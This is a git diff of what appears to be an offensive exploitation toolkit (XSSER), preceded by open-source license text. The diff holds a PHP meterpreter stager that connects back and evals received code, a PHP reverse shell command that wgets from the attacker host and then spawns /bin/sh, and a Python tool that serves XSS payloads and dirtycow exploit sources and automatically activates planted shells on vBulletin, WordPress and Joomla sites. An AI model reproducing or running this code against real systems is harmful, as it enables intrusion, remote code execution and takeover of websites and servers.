+ Permission for Use and Modification Without Distribution + . + (1) You are permitted to use the Standard Version and create and use + Modified Versions for any purpose without restriction, provided that + you do not Distribute the Modified Version. + . + . + Permissions for Redistribution of the Standard Version + . + (2) You may Distribute verbatim copies of the Source form of the + Standard Version of this Package in any medium without restriction, + either gratis or for a Distributor Fee, provided that you duplicate + all of the original copyright notices and associated disclaimers. At + your discretion, such verbatim copies may or may not include a + Compiled form of the Package. + . + (3) You may apply any bug fixes, portability changes, and other + modifications made available from the Copyright Holder. The resulting + Package will still be considered the Standard Version, and as such + will be subject to the Original License. + . + . + Distribution of Modified Versions of the Package as Source + . + (4) You may Distribute your Modified Version as Source (either gratis + or for a Distributor Fee, and with or without a Compiled form of the + Modified Version) provided that you clearly document how it differs + from the Standard Version, including, but not limited to, documenting + any non-standard features, executables, or modules, and provided that + you do at least ONE of the following: + . + (a) make the Modified Version available to the Copyright Holder + of the Standard Version, under the Original License, so that the + Copyright Holder may include your modifications in the Standard + Version. + . + (b) ensure that installation of your Modified Version does not + prevent the user installing or running the Standard Version. In + addition, the Modified Version must bear a name that is different + from the name of the Standard Version. + . + (c) allow anyone who receives a copy of the Modified Version to + make the Source form of the Modified Version available to others + under + . + (i) the Original License or + . + (ii) a license that permits the licensee to freely copy, + modify and redistribute the Modified Version using the same + licensing terms that apply to the copy that the licensee + received, and requires that the Source form of the Modified + Version, and of any works derived from it, be made freely + available in that license fees are prohibited but Distributor + Fees are allowed. + . + . + Distribution of Compiled Forms of the Standard Version + or Modified Versions without the Source + . + (5) You may Distribute Compiled forms of the Standard Version without + the Source, provided that you include complete instructions on how to + get the Source of the Standard Version. Such instructions must be + valid at the time of your distribution. If these instructions, at any + time while you are carrying out such distribution, become invalid, you + must provide new instructions on demand or cease further distribution. + If you provide valid instructions or cease distribution within thirty + days after you become aware that the instructions are invalid, then + you do not forfeit any of your rights under this license. + . + (6) You may Distribute a Modified Version in Compiled form without + the Source, provided that you comply with Section 4 with respect to + the Source of the Modified Version. + . + . + Aggregating or Linking the Package + . + (7) You may aggregate the Package (either the Standard Version or + Modified Version) with other packages and Distribute the resulting + aggregation provided that you do not charge a licensing fee for the + Package. Distributor Fees are permitted, and licensing fees for other + components in the aggregation are permitted. The terms of this license + apply to the use and Distribution of the Standard or Modified Versions + as included in the aggregation. + . + (8) You are permitted to link Modified and Standard Versions with + other works, to embed the Package in a larger work of your own, or to + build stand-alone binary or bytecode versions of applications that + include the Package, and Distribute the result without restriction, + provided the result does not expose a direct interface to the Package. + . + . + Items That are Not Considered Part of a Modified Version + . + (9) Works (including, but not limited to, modules and scripts) that + merely extend or make use of the Package, do not, by themselves, cause + the Package to be a Modified Version. In addition, such works are not + considered parts of the Package itself, and are not subject to the + terms of this license. + . + . + General Provisions + . + (10) Any use, modification, and distribution of the Standard or + Modified Versions is governed by this Artistic License. By using, + modifying or distributing the Package, you accept this license. Do not + use, modify, or distribute the Package, if you do not accept this + license. + . + (11) If your Modified Version has been derived from a Modified + Version made by someone other than you, you are nevertheless required + to ensure that your Modified Version complies with the requirements of + this license. + . + (12) This license does not grant you the right to use any trademark, + service mark, tradename, or logo of the Copyright Holder. + . + (13) This license includes the non-exclusive, worldwide, + free-of-charge patent license to make, have made, use, offer to sell, + sell, import and otherwise transfer the Package with respect to any + patent claims licensable by the Copyright Holder that are necessarily + infringed by the Package. If you institute patent litigation + (including a cross-claim or counterclaim) against any party alleging + that the Package constitutes direct or contributory patent + infringement, then this Artistic License to you shall terminate on the + date that such litigation is filed. + . + (14) Disclaimer of Warranty: + THE PACKAGE IS PROVIDED BY THE COPYRIGHT HOLDER AND CONTRIBUTORS "AS + IS' AND WITHOUT ANY EXPRESS OR IMPLIED WARRANTIES. THE IMPLIED + WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE, OR + NON-INFRINGEMENT ARE DISCLAIMED TO THE EXTENT PERMITTED BY YOUR LOCAL + LAW. UNLESS REQUIRED BY LAW, NO COPYRIGHT HOLDER OR CONTRIBUTOR WILL + BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, OR CONSEQUENTIAL + DAMAGES ARISING IN ANY WAY OUT OF THE USE OF THE PACKAGE, EVEN IF + ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + +License: Apache + Version 2.0, January 2004 + http://www.apache.org/licenses/ + . + TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION + . + 1. Definitions. + . + "License" shall mean the terms and conditions for use, reproduction, + and distribution as defined by Sections 1 through 9 of this document. + . + "Licensor" shall mean the copyright owner or entity authorized by + the copyright owner that is granting the License. + . + "Legal Entity" shall mean the union of the acting entity and all + other entities that control, are controlled by, or are under common + control with that entity. For the purposes of this definition, + "control" means (i) the power, direct or indirect, to cause the + direction or management of such entity, whether by contract or + otherwise, or (ii) ownership of fifty percent (50%) or more of the + outstanding shares, or (iii) beneficial ownership of such entity. + . + "You" (or "Your") shall mean an individual or Legal Entity + exercising permissions granted by this License. + . + "Source" form shall mean the preferred form for making modifications, + including but not limited to software source code, documentation + source, and configuration files. + . + "Object" form shall mean any form resulting from mechanical + transformation or translation of a Source form, including but + not limited to compiled object code, generated documentation, + and conversions to other media types. + . + "Work" shall mean the work of authorship, whether in Source or + Object form, made available under the License, as indicated by a + copyright notice that is included in or attached to the work + (an example is provided in the Appendix below). + . + "Derivative Works" shall mean any work, whether in Source or Object + form, that is based on (or derived from) the Work and for which the + editorial revisions, annotations, elaborations, or other modifications + represent, as a whole, an original work of authorship. For the purposes + of this License, Derivative Works shall not include works that remain + separable from, or merely link (or bind by name) to the interfaces of, + the Work and Derivative Works thereof. + . + "Contribution" shall mean any work of authorship, including + the original version of the Work and any modifications or additions + to that Work or Derivative Works thereof, that is intentionally + submitted to Licensor for inclusion in the Work by the copyright owner + or by an individual or Legal Entity authorized to submit on behalf of + the copyright owner. For the purposes of this definition, "submitted" + means any form of electronic, verbal, or written communication sent + to the Licensor or its representatives, including but not limited to + communication on electronic mailing lists, source code control systems, + and issue tracking systems that are managed by, or on behalf of, the + Licensor for the purpose of discussing and improving the Work, but + excluding communication that is conspicuously marked or otherwise + designated in writing by the copyright owner as "Not a Contribution." + . + "Contributor" shall mean Licensor and any individual or Legal Entity + on behalf of whom a Contribution has been received by Licensor and + subsequently incorporated within the Work. + . + 2. Grant of Copyright License. Subject to the terms and conditions of + this License, each Contributor hereby grants to You a perpetual, + worldwide, non-exclusive, no-charge, royalty-free, irrevocable + copyright license to reproduce, prepare Derivative Works of, + publicly display, publicly perform, sublicense, and distribute the + Work and such Derivative Works in Source or Object form. + . + 3. Grant of Patent License. Subject to the terms and conditions of + this License, each Contributor hereby grants to You a perpetual, + worldwide, non-exclusive, no-charge, royalty-free, irrevocable + (except as stated in this section) patent license to make, have made, + use, offer to sell, sell, import, and otherwise transfer the Work, + where such license applies only to those patent claims licensable + by such Contributor that are necessarily infringed by their + Contribution(s) alone or by combination of their Contribution(s) + with the Work to which such Contribution(s) was submitted. If You + institute patent litigation against any entity (including a + cross-claim or counterclaim in a lawsuit) alleging that the Work + or a Contribution incorporated within the Work constitutes direct + or contributory patent infringement, then any patent licenses + granted to You under this License for that Work shall terminate + as of the date such litigation is filed. + . + 4. Redistribution. You may reproduce and distribute copies of the + Work or Derivative Works thereof in any medium, with or without + modifications, and in Source or Object form, provided that You + meet the following conditions: + . + (a) You must give any other recipients of the Work or + Derivative Works a copy of this License; and + . + (b) You must cause any modified files to carry prominent notices + stating that You changed the files; and + . + (c) You must retain, in the Source form of any Derivative Works + that You distribute, all copyright, patent, trademark, and + attribution notices from the Source form of the Work, + excluding those notices that do not pertain to any part of + the Derivative Works; and + . + (d) If the Work includes a "NOTICE" text file as part of its + distribution, then any Derivative Works that You distribute must + include a readable copy of the attribution notices contained + within such NOTICE file, excluding those notices that do not + pertain to any part of the Derivative Works, in at least one + of the following places: within a NOTICE text file distributed + as part of the Derivative Works; within the Source form or + documentation, if provided along with the Derivative Works; or, + within a display generated by the Derivative Works, if and + wherever such third-party notices normally appear. The contents + of the NOTICE file are for informational purposes only and + do not modify the License. You may add Your own attribution + notices within Derivative Works that You distribute, alongside + or as an addendum to the NOTICE text from the Work, provided + that such additional attribution notices cannot be construed + as modifying the License. + . + You may add Your own copyright statement to Your modifications and + may provide additional or different license terms and conditions + for use, reproduction, or distribution of Your modifications, or + for any such Derivative Works as a whole, provided Your use, + reproduction, and distribution of the Work otherwise complies with + the conditions stated in this License. + . + 5. Submission of Contributions. Unless You explicitly state otherwise, + any Contribution intentionally submitted for inclusion in the Work + by You to the Licensor shall be under the terms and conditions of + this License, without any additional terms or conditions. + Notwithstanding the above, nothing herein shall supersede or modify + the terms of any separate license agreement you may have executed + with Licensor regarding such Contributions. + . + 6. Trademarks. This License does not grant permission to use the trade + names, trademarks, service marks, or product names of the Licensor, + except as required for reasonable and customary use in describing the + origin of the Work and reproducing the content of the NOTICE file. + . + 7. Disclaimer of Warranty. Unless required by applicable law or + agreed to in writing, Licensor provides the Work (and each + Contributor provides its Contributions) on an "AS IS" BASIS, + WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or + implied, including, without limitation, any warranties or conditions + of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A + PARTICULAR PURPOSE. You are solely responsible for determining the + appropriateness of using or redistributing the Work and assume any + risks associated with Your exercise of permissions under this License. + . + 8. Limitation of Liability. In no event and under no legal theory, + whether in tort (including negligence), contract, or otherwise, + unless required by applicable law (such as deliberate and grossly + negligent acts) or agreed to in writing, shall any Contributor be + liable to You for damages, including any direct, indirect, special, + incidental, or consequential damages of any character arising as a + result of this License or out of the use or inability to use the + Work (including but not limited to damages for loss of goodwill, + work stoppage, computer failure or malfunction, or any and all + other commercial damages or losses), even if such Contributor + has been advised of the possibility of such damages. + . + 9. Accepting Warranty or Additional Liability. While redistributing + the Work or Derivative Works thereof, You may choose to offer, + and charge a fee for, acceptance of support, warranty, indemnity, + or other liability obligations and/or rights consistent with this + License. However, in accepting such obligations, You may act only + on Your own behalf and on Your sole responsibility, not on behalf + of any other Contributor, and only if You agree to indemnify, + defend, and hold each Contributor harmless for any liability + incurred by, or claims asserted against, such Contributor by reason + of your accepting any such warranty or additional liability. + . + END OF TERMS AND CONDITIONS + . + APPENDIX: How to apply the Apache License to your work. + . + To apply the Apache License to your work, attach the following + boilerplate notice, with the fields enclosed by brackets "[]" + replaced with your own identifying information. (Don't include + the brackets!) The text should be enclosed in the appropriate + comment syntax for the file format. We also recommend that a + file or class name and description of purpose be included on the + same "printed page" as the copyright notice for easier + identification within third-party archives. + . + Copyright [yyyy] [name of copyright owner] + . + Licensed under the Apache License, Version 2.0 (the "License"); + you may not use this file except in compliance with the License. + You may obtain a copy of the License at + . + http://www.apache.org/licenses/LICENSE-2.0 + . + Unless required by applicable law or agreed to in writing, software + distributed under the License is distributed on an "AS IS" BASIS, + WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + See the License for the specific language governing permissions and + limitations under the License. + +License: Zlib + This software is provided 'as-is', without any express or implied + warranty. In no event will the authors be held liable for any damages + arising from the use of this software. + . + Permission is granted to anyone to use this software for any purpose, + including commercial applications, and to alter it and redistribute it + freely, subject to the following restrictions: + . + 1. The origin of this software must not be misrepresented; you must not + claim that you wrote the original software. If you use this software + in a product, an acknowledgment in the product documentation would be + appreciated but is not required. + 2. Altered source versions must be plainly marked as such, and must not be + misrepresented as being the original software. 3. This notice may not be removed or altered from any source distribution. \ No newline at end of file diff --git a/Shells/meterpreter/meterpreter.php b/Shells/meterpreter/meterpreter.php index 5dce3c2..50e698c 100644 --- a/Shells/meterpreter/meterpreter.php +++ b/Shells/meterpreter/meterpreter.php @@ -1,56 +1,56 @@ - -error_reporting(0); - - -$ip = 'LOCALHOST'; -$port = LOCALPORT; -$ipf = AF_INET; - -if (FALSE !== strpos($ip, ":")) { - - $ip = "[". $ip ."]"; - $ipf = AF_INET6; -} - -if (($f = 'stream_socket_client') && is_callable($f)) { - $s = $f("tcp://{$ip}:{$port}"); - $s_type = 'stream'; - } elseif (($f = 'fsockopen') && is_callable($f)) { - $s = $f($ip, $port); - $s_type = 'stream'; - } elseif (($f = 'socket_create') && is_callable($f)) { - $s = $f($ipf, SOCK_STREAM, SOL_TCP); - $res = @socket_connect($s, $ip, $port); - if (!$res) { die(); } - $s_type = 'socket'; - } else { - die('no socket funcs'); - } -if (!$s) { die('no socket'); } - -switch ($s_type) { -case 'stream': $len = fread($s, 4); break; -case 'socket': $len = socket_read($s, 4); break; - } -if (!$len) { - - - die(); - } -$a = unpack("Nlen", $len); -$len = $a['len']; - -$b = ''; - while (strlen($b) < $len) { - switch ($s_type) { - case 'stream': $b .= fread($s, $len-strlen($b)); break; - case 'socket': $b .= socket_read($s, $len-strlen($b)); break; - } - } - - -$GLOBALS['msgsock'] = $s; -$GLOBALS['msgsock_type'] = $s_type; -eval($b); -die(); - + +error_reporting(0); + + +$ip = 'LOCALHOST'; +$port = LOCALPORT; +$ipf = AF_INET; + +if (FALSE !== strpos($ip, ":")) { + + $ip = "[". $ip ."]"; + $ipf = AF_INET6; +} + +if (($f = 'stream_socket_client') && is_callable($f)) { + $s = $f("tcp://{$ip}:{$port}"); + $s_type = 'stream'; + } elseif (($f = 'fsockopen') && is_callable($f)) { + $s = $f($ip, $port); + $s_type = 'stream'; + } elseif (($f = 'socket_create') && is_callable($f)) { + $s = $f($ipf, SOCK_STREAM, SOL_TCP); + $res = @socket_connect($s, $ip, $port); + if (!$res) { die(); } + $s_type = 'socket'; + } else { + die('no socket funcs'); + } +if (!$s) { die('no socket'); } + +switch ($s_type) { +case 'stream': $len = fread($s, 4); break; +case 'socket': $len = socket_read($s, 4); break; + } +if (!$len) { + + + die(); + } +$a = unpack("Nlen", $len); +$len = $a['len']; + +$b = ''; + while (strlen($b) < $len) { + switch ($s_type) { + case 'stream': $b .= fread($s, $len-strlen($b)); break; + case 'socket': $b .= socket_read($s, $len-strlen($b)); break; + } + } + + +$GLOBALS['msgsock'] = $s; +$GLOBALS['msgsock_type'] = $s_type; +eval($b); +die(); + diff --git a/Shells/php-reverse-shell-1.0/php-reverse-shell-notify.php b/Shells/php-reverse-shell-1.0/php-reverse-shell-notify.php index 976304c..e5a4db5 100644 --- a/Shells/php-reverse-shell-1.0/php-reverse-shell-notify.php +++ b/Shells/php-reverse-shell-1.0/php-reverse-shell-notify.php @@ -53,7 +53,7 @@ $chunk_size = 1400; $write_a = null; $error_a = null; -$shell = 'uname -a; w; id; wget "LOCALHOST/php_shell_notify.txt" -q; /bin/sh -i'; +$shell = 'uname -a; w; id; wget "LOCALHOST/php_shell_notify.txt" -q -O /dev/null; /bin/sh -i'; $daemon = 0; $debug = 0; diff --git a/requirements-all-libraries-used.txt b/requirements-all-libraries-used.txt new file mode 100644 index 0000000..be173af --- /dev/null +++ b/requirements-all-libraries-used.txt @@ -0,0 +1,15 @@ +###### Requirements without Version Specifiers ###### +base64 +BaseHTTPServer +jsmin +os +pygame +random +re +requests +socket +subprocess +sys +time +traceback +zipfile \ No newline at end of file diff --git a/requirements.txt b/requirements.txt new file mode 100644 index 0000000..9b8b90a --- /dev/null +++ b/requirements.txt @@ -0,0 +1,3 @@ +###### Requirements without Version Specifiers ###### +jsmin +pygame \ No newline at end of file diff --git a/xsser.py b/xsser.py index 3953651..dba773a 100755 --- a/xsser.py +++ b/xsser.py @@ -1,434 +1,608 @@ #!/usr/bin/env python # -*- coding: utf-8 -*- # -# Version: 2.5.1 - TEST -# Date: 04/Dec/17 +# Version: 2.7.5 - Black Hat Europe Release + Extras +# Music Codename: Soul Cypherz - Maya +# Presentation Date: 07/Dec/17 +# Release Date: 08/Mar/2018 # Author: Hans-Michael Varbaek -# Company: Sense of Security -# Credits: MaXe / InterN0T +# Company: VarBITS +# Special Credits: MaXe / InterN0T # -# Requirements: -# - Gnome (gnome-terminal) -# - Bash -# - Msfconsole -# - Netcat (nc) -# - cURL (curl) [NEW] -# - PyGame (apt-get install python-pygame) [NEW] -# -# Written for: -# - Python 2.7.11 -# -# Tested on: -# - Kali Linux VM 2016.1 -# -# Tested against: -# - Chrome (14 Nov 2015) - This should still work. -# - FireFox (04 Nov 2016) -# -# Changelog: -# - WordPress Theme and Plugin injection are not using a hardcoded hostname anymore. (TARGETWEBSITE is now properly replaced) -# - Removed deprecated code for WordPress Theme and Plugin injection, so that the user is not asked twice to provide hostname to exploit. -# - Added dirtycow 32-bit and 64-bit source code files to the web servers. https://www.exploit-db.com/exploits/40616/ Note: This seems to cause kernel panic after the user quits the shell. -# - Removed --title from gnome-terminal commands as this option is no longer supported. -# - Notifications: -# -- Added notification to the console / web server log. -# -- Added a popup terminal notification with some ANSI text when the JavaScript is executed and "JS Shell Notify" is triggered. -# -- Added a voice notification when the Reverse PHP Shell (Notify) option is executed on the remote server. Shell attempts to wget back to this host to the PHP Shell Notify web handler. -# - Automation: -# -- vBulletin and WordPress shells are now automatically activated when the JavaScript is triggered. -# - New attack vectors: -# -- Joomla "SecurityCheck" Addon - https://www.exploit-db.com/exploits/39879/ - EDB ID: 39879 +# TODO List: +# - Use another type of web server that's easier to maintain. +# - Custom PHP shell that features a file manager. +# - Maybe reintroduce the feature that allows users to specify their own PHP code. +# - Python GUI like NCurses for example. +# - Make xsser.py compatible with Python3 and eventually switch to this version. +# - Check if xsser.py is run on Linux, as several commands still assume the host OS is Linux. +# - Ensure "requirements.txt" is up to date in each version, and that there's documentation for it. +# - Add proxy support for modules that automatically send the exploit. (e.g. SSH Socks Proxy) +# - All PHP shells uploaded to the target should be base64 encoded. +# - Maybe add additional obfuscation (or encryption) to the payloads in the future. +# - Regex replacement: with https://stackoverflow.com/questions/6116978/how-to-replace-multiple- +# substrings-of-a-string +# https://gomputor.wordpress.com/2008/09/27/search-replace-multiple-words-or-characters-with-python/ +# https://www.safaribooksonline.com/library/view/python-cookbook-2nd/0596007973/ch01s19.html +# https://stackoverflow.com/questions/6116978/how-to-replace-multiple-substrings-of-a-string +# - Remake the menu system. It's not very maintainable. +# - Remake how exploits are loaded by the tool. +# -- Then add a lot more exploits to this tool. +# - Add payloads for other content management systems such as Drupal. # ============================================================================================ # -# Standard libraries -import sys import os -import time - -# For payload preparation import re +import sys +import time import base64 - -# For exploits and our HTTP server -import urllib # Needed for Joomla URL encoding [NEW] import random -import httplib -import socket +import zipfile +import requests +import traceback +from socket import error as socket_error +from subprocess import check_output # TODO: Switch completely to this or a similar library instead of os.system() from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer -# Import pygame audio library -import pygame # [NEW] +# Non-Standard Libraries +import pygame # Audio notifications +from jsmin import jsmin # Minified JavaScript payloads + +# Old libraries no longer being used. (There's a good chance some of them may be used in the future.) +# import urllib +# import httplib +# import socket + +# Used for generating random filenames for web server requests +random_filename = list('abcdefghijklmnopqrstuvwxyz0123456789') +# print "".join(random.sample(random_filename, 5))+".js" + + +# https://stackoverflow.com/questions/1855095/how-to-create-a-zip-archive-of-a-directory +def zipdir(path, ziph): + # ziph is zipfile handle + for root, dirs, files in os.walk(path): + for filename in files: + ziph.write(os.path.join(root, filename)) + + +# Generate the Hello Shell on startup. +# TODO: Make the backdoor name fully dynamic in the future. +def generate_helloshell(): + zipf = zipfile.ZipFile('Hello_Shell.zip', 'w', zipfile.ZIP_DEFLATED) + zipdir('Hello_Shell/', zipf) + zipf.close() + + +def enable_js_alert(): + os.system("chmod +x js_alert.sh") + + +# Exit program - Default return code is zero. +def exit_xsser(exit_code=0): + sys.exit(exit_code) -# Required constants -menu_actions = {} # ====================== # # DEFINED CLASSES -# ====================== # - -# ANSI font color class -class fontcolors: - RED = '\033[91m' - GREEN = '\033[92m' - YELLOW = '\033[93m' - BLUE = '\033[94m' - ENDC = '\033[0m' - BOLD = '\033[1m' - UNDERLINE = '\033[4m' +# ====================== # + +class FontColors: + # ANSI font color class + RED = '\033[91m' + GREEN = '\033[92m' + YELLOW = '\033[93m' + BLUE = '\033[94m' + ENDC = '\033[0m' + BOLD = '\033[1m' + UNDERLINE = '\033[4m' + + def __init__(self): + self.not_used = None + +# TODO: Look into using another type of "web server" which is just as simple but also more flexible. +# TODO: Merge vBSEO and the WordPress/Joomla classes in the future. # vBSEO web server class (LinkBack vulnerability specific) class MyHandler(BaseHTTPRequestHandler): - def do_GET(self): - try: - if self.path.endswith("%s.php" % evil_php): - self.send_response(200) - self.send_header('Content-type','text/html') - self.end_headers() - self.wfile.write('%s' % xss_title) - self.wfile.write('

vBSEO Stored Cross-site Scripting



') - self.wfile.write('I found this awesome forum' % target_link) - self.wfile.write('
') - return - - if self.path.endswith("%s.js" % evil_jsf): - self.send_response(200) - self.send_header('Content-type', 'text/plain') - self.end_headers() - self.wfile.write(js_output) # Serve File - return - - if self.path.endswith("js_shell_notify.txt"): - self.send_response(200) - self.send_header('Content-type', 'text/plain') - self.end_headers() - self.wfile.write('Hello?') - # NEW FEATURES BELOW - # Terminal and Popup Terminal Notifications - print fontcolors.YELLOW + fontcolors.BOLD+"[!] JavaScript payload was activated!"+fontcolors.ENDC - os.system('gnome-terminal --hide-menubar -e "bash -c \' ./js_alert.sh; exec bash\'"') # ASCII ART - # Activate shell request for vBulletin - os.system('curl "%s/misc.php?activateshell=true" -o /dev/null -stderr /dev/null &' % finaltarget) # If the Python script encounters an error, the response (i.e. error) will be in the JS output which breaks our payload. - return - - if self.path.endswith("php_shell_notify.txt"): - self.send_response(200) - self.send_header('Content-type', 'text/plain') - self.end_headers() - self.wfile.write('Hello again?') - YouGotShell() # NEW FEATURE - return - - if self.path.endswith("dcow32.c"): - self.send_response(200) - self.send_header('Content-type', 'text/plain') - self.end_headers() - self.wfile.write(dcow32_output) # Serve File - return - - if self.path.endswith("dcow64.c"): - self.send_response(200) - self.send_header('Content-type', 'text/plain') - self.end_headers() - self.wfile.write(dcow64_output) # Serve File - return - - if self.path.endswith(""): - self.send_response(200) - self.send_header('Content-type', 'text/html') - self.end_headers() - self.wfile.write('Empty

Nothing to see here..

') - return - - return - - except IOError: - self.send_error(404,'File Not Found: %s' % self.path) + # noinspection PyPep8Naming + def do_GET(self): # I know this is not PEP8 compliant, but this class uses the "do_GET" format. + try: + if self.path.endswith("{}.php".format(evil_php)): + self.send_response(200) + self.send_header('Content-type', 'text/html') + self.end_headers() + self.wfile.write('{}'.format(xss_title)) + self.wfile.write('

vBSEO Stored Cross-site Scripting



') + self.wfile.write('I found this awesome forum'.format(target_link)) + self.wfile.write('
') + return + + if self.path.endswith("{}.js".format(evil_jsf)): + self.send_response(200) + self.send_header('Content-type', 'text/plain') + self.end_headers() + self.wfile.write(js_output) # Serve JS contents + return + + if self.path.endswith("js_shell_notify.txt"): + self.send_response(200) + self.send_header('Content-type', 'text/plain') + self.send_header('Access-Control-Allow-Origin', '*') # Mostly here to limit browser console errors. + self.end_headers() + self.wfile.write('Hello?') + # NEW CODE BELOW + # Terminal and Popup Terminal Notifications + print FontColors.YELLOW + FontColors.BOLD + "[!] JavaScript payload was activated!" + FontColors.ENDC + # os.system('gnome-terminal --hide-menubar -e "bash -c \' ./js_alert.sh; exec bash\'"') # ASCII ART + # Everything seems to becoming deprecated with gnome-terminal, so we've switched to xterm. + # xterm -hold -e command + # check_output(['xterm', '-fa', '"Monospace"', '-fs', '14', '-hold', '-e', './js_alert.sh', '&']) + os.system('xterm -fa "Monospace" -fs 14 -hold -e ./js_alert.sh &') # Size 14 is quite large + # xterm -hold -e 'ls' & # Without the ampersand xterm blocks the python script from executing. + # TODO: Replace os.system with e.g. subprocess.call() or check_output() in future versions. + # subprocess.call(["ls", "-al"]) + # subprocess.call("ls -al", shell=True) + # Activate shell request for vBulletin + + # Because this happens so fast, we need to introduce a one second delay. + print "[*] Waiting 1 second before automatically activating shell." + time.sleep(1) + # TODO: Fix the odd and random 404 error that sometimes occurs. + payload = {"activateshell": "true"} + url = "http://{}/misc.php".format(finaltarget) + requests.get(url, params=payload, timeout=3) + # TODO: Ask the user for the full URL including HTTP/HTTPS in the future. + # os.system( + # 'curl "%s/misc.php?activateshell=true" -o /dev/null -stderr /dev/null &' % finaltarget) + # If the Python script encounters an error, the response (i.e. error) will be in the JS output + # which breaks our payload. + return + + if self.path.endswith("php_shell_notify.txt"): + self.send_response(200) + self.send_header('Content-type', 'text/plain') + self.end_headers() + self.wfile.write('Hello again?') + you_got_shell() + return + + if self.path.endswith("dcow32.c"): + self.send_response(200) + self.send_header('Content-type', 'text/plain') + self.end_headers() + self.wfile.write(dcow32_output) # Serve File + return + + if self.path.endswith("dcow64.c"): + self.send_response(200) + self.send_header('Content-type', 'text/plain') + self.end_headers() + self.wfile.write(dcow64_output) # Serve File + return + + if self.path.endswith(""): + self.send_response(200) + self.send_header('Content-type', 'text/html') + self.end_headers() + self.wfile.write( + 'Empty

Nothing to see here..

') + return + + return + + except IOError: + self.send_error(404, 'File Not Found: {}'.format(self.path)) + # WordPress/generic (payload) web server class class WordPressHandler(BaseHTTPRequestHandler): - def do_GET(self): - try: - if self.path.endswith("x.js"): # Static for now - self.send_response(200) - self.send_header('Content-type', 'text/plain') - self.end_headers() - self.wfile.write(js_output) - return - - if self.path.endswith("js_shell_notify.txt"): - self.send_response(200) - self.send_header('Content-type', 'text/plain') - self.end_headers() - self.wfile.write('Hello?') - # NEW FEATURES BELOW - # Terminal and Popup Terminal Notifications - print fontcolors.YELLOW + fontcolors.BOLD+"[!] JavaScript payload was activated!"+fontcolors.ENDC - os.system('gnome-terminal --hide-menubar -e "bash -c \' ./js_alert.sh; exec bash\'"') # ASCII ART - # Activate shell request for WordPress - curlpath = "%s%sactivateshell=true" % (target_hostname, activation_file) # Moved the "?" character to the individual files due to Joomla needs to use "&" - os.system('curl "%s" -o /dev/null -stderr /dev/null &' % curlpath) # If the Python script encounters an error, the response (i.e. error) will be in the JS output which breaks our payload. - return - - if self.path.endswith("php_shell_notify.txt"): - self.send_response(200) - self.send_header('Content-type', 'text/plain') - self.end_headers() - self.wfile.write('Hello again?') - YouGotShell() # NEW FEATURE - return - - if self.path.endswith("dcow32.c"): - self.send_response(200) - self.send_header('Content-type', 'text/plain') - self.end_headers() - self.wfile.write(dcow32_output) # Serve File - return - - if self.path.endswith("dcow64.c"): - self.send_response(200) - self.send_header('Content-type', 'text/plain') - self.end_headers() - self.wfile.write(dcow64_output) # Serve File - return - - # To be added in a future version of XSSER - #if self.path.endswith("joomla_hello_shell.zip"): - # self.send_response(200) - # self.send_header('Content-type', 'text/plain') - # self.end_headers() - # self.wfile.write(joomla_hello_shell) - # return - - if self.path.endswith(""): - self.send_response(200) - self.send_header('Content-type', 'text/html') - self.end_headers() - self.wfile.write('Empty

Nothing to see here..

') - return - - return - - except IOError: - self.send_error(404,'File Not Found: %s' % self.path) + # noinspection PyPep8Naming + def do_GET(self): # I know this is not PEP8 compliant, see class implementation. + try: + # if js_filename and js_filename != "": + if self.path.endswith(js_filename): # TODO: Check size limitations? + self.send_response(200) + self.send_header('Content-type', 'text/plain') + self.end_headers() + self.wfile.write(js_output) # Serve JS contents + return + + if self.path.endswith("js_shell_notify.txt"): + self.send_response(200) + self.send_header('Content-type', 'text/plain') + self.send_header('Access-Control-Allow-Origin', '*') # Mostly here to limit browser console errors. + self.end_headers() + self.wfile.write('Hello?') + # NEW CODE BELOW + # Terminal and Popup Terminal Notifications + print FontColors.YELLOW + FontColors.BOLD + "[!] JavaScript payload was activated!" + FontColors.ENDC + # os.system('gnome-terminal --hide-menubar -e "bash -c \' ./js_alert.sh; exec bash\'"') # ASCII ART + os.system('xterm -fa "Monospace" -fs 14 -hold -e ./js_alert.sh &') + # New method as gnome-terminal deprecated/removed too many options. + # Activate shell request for WordPress and Joomla + if activation_file is not "NOT_APPLICABLE": + # Because this happens so fast, we need to introduce a one second delay. + print "[*] Waiting 1 second before automatically activating shell." + time.sleep(1) + + # TODO: Test this - New method 2.75 + # todo This seems to work, but there's an odd 404 error when the shell is activated. + # todo See if you can eliminate this 404 error. + payload = {"activateshell": "true"} + url = "http://{}{}".format(target_hostname, activation_file) + requests.get(url, params=payload, timeout=3) + # TODO: Ask the user for the full URL including HTTP/HTTPS in the future. + # curlpath = "{}{}activateshell=true".format(target_hostname, activation_file) + # os.system( + # 'curl "%s" -o /dev/null -stderr /dev/null &' % curlpath) + # If the Python script encounters an error, the response (i.e. error) will be in the JS output + # which breaks our payload. + return + + if self.path.endswith("php_shell_notify.txt"): + self.send_response(200) + self.send_header('Content-type', 'text/plain') + self.end_headers() + self.wfile.write('Hello again?') + you_got_shell() + return + + if self.path.endswith("dcow32.c"): + self.send_response(200) + self.send_header('Content-type', 'text/plain') + self.end_headers() + self.wfile.write(dcow32_output) # Serve File + return + + if self.path.endswith("dcow64.c"): + self.send_response(200) + self.send_header('Content-type', 'text/plain') + self.end_headers() + self.wfile.write(dcow64_output) # Serve File + return + + # TODO: Make the backdoor name dynamic in the future. + # TODO: This shouldn't be too hard, as the file being read is now handled elsewhere. + if self.path.endswith("Hello_Shell.zip"): # You can change this to anything. + self.send_response(200) # Just make sure it's consistent throughout the script. + # self.send_header('Content-type', 'text/plain') + self.send_header('Content-type', 'application/octet-stream') + self.send_header('Content-Disposition', 'attachment; filename=Hello_Shell.zip') + self.end_headers() + self.wfile.write(read_joomla_shell_file()) + return + + if self.path.endswith(""): + self.send_response(200) + self.send_header('Content-type', 'text/html') + self.end_headers() + self.wfile.write( + 'Empty

Nothing to see here..

